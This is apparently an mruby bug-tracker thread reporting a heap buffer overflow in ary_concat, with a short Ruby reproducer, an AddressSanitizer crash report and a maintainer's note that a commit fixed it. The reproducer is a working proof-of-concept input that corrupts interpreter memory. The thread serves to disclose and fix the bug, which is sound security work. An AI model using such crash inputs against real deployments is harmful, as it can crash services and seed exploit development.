Heap buffer overflow in ary_concat

[clayton-shopify]

The following input demonstrates a crash:

class CVAR1
def send(c, b, x)
super(*c)
super(*b)
end

end

mvarsend1 = def to_s
yield c==c
end

CVAR1.new.send(mvarsend1, 0, 0)

ASAN report:

==12212==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62f000000018 at pc 0x0001055ff712 bp 0x7fff5a5fd340 sp 0x7fff5a5fd338
READ of size 4 at 0x62f000000018 thread T0
    #0 0x1055ff711 in ary_concat array.c:265
    #1 0x1055ff5d4 in mrb_ary_concat array.c:284
    #2 0x105784e86 in mrb_vm_exec (mruby:x86_64+0x10018be86)
    #3 0x10575edbf in mrb_vm_run (mruby:x86_64+0x100165dbf)
    #4 0x1057918d9 in mrb_top_run (mruby:x86_64+0x1001988d9)
    #5 0x105862c65 in mrb_load_exec (mruby:x86_64+0x100269c65)
    #6 0x1058635b5 in mrb_load_file_cxt (mruby:x86_64+0x10026a5b5)
    #7 0x1055fb0e6 in main mruby.c:227
    #8 0x7fffbbbba234 in start (libdyld.dylib:x86_64+0x5234)

0x62f000000018 is located 1000 bytes to the left of 49200-byte region [0x62f000000400,0x62f00000c430)
allocated by thread T0 here:
    #0 0x105a0a520 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56520)
    #1 0x1056f3a85 in mrb_default_allocf (mruby:x86_64+0x1000faa85)
    #2 0x105674d58 in mrb_realloc_simple gc.c:202
    #3 0x10567543e in mrb_realloc gc.c:216
    #4 0x105675ec3 in mrb_malloc gc.c:237
    #5 0x105675f5d in mrb_calloc gc.c:255
    #6 0x105676509 in add_heap gc.c:325
    #7 0x105676353 in mrb_gc_init gc.c:358
    #8 0x1056f38dc in mrb_open_core (mruby:x86_64+0x1000fa8dc)
    #9 0x1056f3bec in mrb_open_allocf (mruby:x86_64+0x1000fabec)
    #10 0x1056f3bb7 in mrb_open (mruby:x86_64+0x1000fabb7)
    #11 0x1055f9ff8 in main mruby.c:171
    #12 0x7fffbbbba234 in start (libdyld.dylib:x86_64+0x5234)

SUMMARY: AddressSanitizer: heap-buffer-overflow array.c:265 in ary_concat
Shadow bytes around the buggy address:
  0x1c5dffffffb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c5dffffffc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c5dffffffd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c5dffffffe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c5dfffffff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c5e00000000: fa fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c5e00000010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c5e00000020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c5e00000030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c5e00000040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c5e00000050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12212==ABORTING
Abort trap: 6

This issue was reported by https://hackerone.com/flamezzz

[matz]

f6c70bc fixed this too.